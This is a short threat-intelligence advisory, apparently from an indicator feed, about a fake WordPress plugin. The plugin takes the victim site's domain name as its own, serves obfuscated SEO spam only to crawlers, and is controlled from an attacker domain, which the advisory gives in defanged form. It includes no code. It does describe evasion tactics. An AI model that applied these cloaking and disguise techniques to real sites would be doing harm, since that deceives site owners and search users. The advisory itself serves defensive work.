216.73.217.50

Fake Spam Plugin Uses Victim's Domain Name to Evade Detection

· Published 06/07/2025 13:13 · Modified 13/07/2025 09:32

Export JSON

Essential information

Published
06/07/2025 13:13
Modified
13/07/2025 09:32
Tags
2025-07-06 code injection evasion techniques obfuscation plugin disguise remote-control search engine manipulation seo spam stealth malware wordpress
Related entities
1 observables, 13 techniques (mitre)

Description

A sophisticated infection was discovered utilizing a cleverly crafted plugin that mimics the infected domain's name to avoid detection. The malware injects spam content into websites, targeting search engine rankings, and only activates under specific conditions like when a crawler is detected. The plugin's code is heavily obfuscated, using thousands of variable assignments broken into small parts. When decoded, the malware downloads files from external hosts, fetches remote content, and delivers custom spam to search engines while appearing normal to regular users. The attacker's domain, mag1cw0rld[.]com, is used for remote control. This technique allows the spam to remain undetected for longer periods, making it challenging to identify with traditional tools.

External references